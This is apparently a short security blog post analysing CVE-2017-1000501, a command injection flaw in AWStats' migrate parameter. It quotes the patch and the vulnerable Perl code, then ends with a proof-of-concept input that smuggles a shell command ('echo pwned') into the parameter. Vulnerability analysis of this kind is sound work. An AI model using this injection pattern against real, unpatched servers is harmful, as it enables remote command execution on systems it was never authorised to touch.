prsecurity.org

building awstat cve-2017–1000501 poc

This is a quick and dirty analysis of an old command injection bug in a Perl script.

The AWStat ChangeLog mentions a fix for CVE-2017–1000501, published in version 7.7.

Let’s look in the patch:

They have changed

$SiteConfig = $5 ? $5 : ‘xxx’;

into

$SiteConfig = &Sanitize($5 ? $5 : ‘xxx’);

The Sanitze function is defined as:

sub Sanitize {
 my $stringtoclean = shift;
 my $full = shift || 0;
 if ($full) {
  $stringtoclean =~ s/[^\w\d]//g;
 }
 else {
  $stringtoclean =~ s/[^\w\d\-\\\/\.:\s]//g;
 }
 return $stringtoclean;
}

Which basically means it only allows chars or _ — \ / . \s to pass thru. Prior to the patch, the user input would pass as is. The whole code is this:

if ( $ARGV[$_] =~ /(^|-|&|&)migrate=([^&]+)/i ) {
   $MigrateStats = "$2";
   $MigrateStats =~ /^(.*)$PROG(\d{0,2})(\d\d)(\d\d\d\d)(.*)\.txt$/;
   $SiteConfig = $5 ? $5 : 'xxx';
   $SiteConfig =~ s/^\.//;    # SiteConfig is used to find config file
   print $SiteConfig;
   next;
  }

To exploit this functionality you either need to submit a GET request with a proper migrate parameter, but to PoC it you can use CLI. Following MigrateStats regexp pattern, we have

migrate=awstats12345678./x;echo pwned;.txt

as a PoC from CLI:

perl awstats.pl -migrate=awstats00000000./x;echo pwned;.txt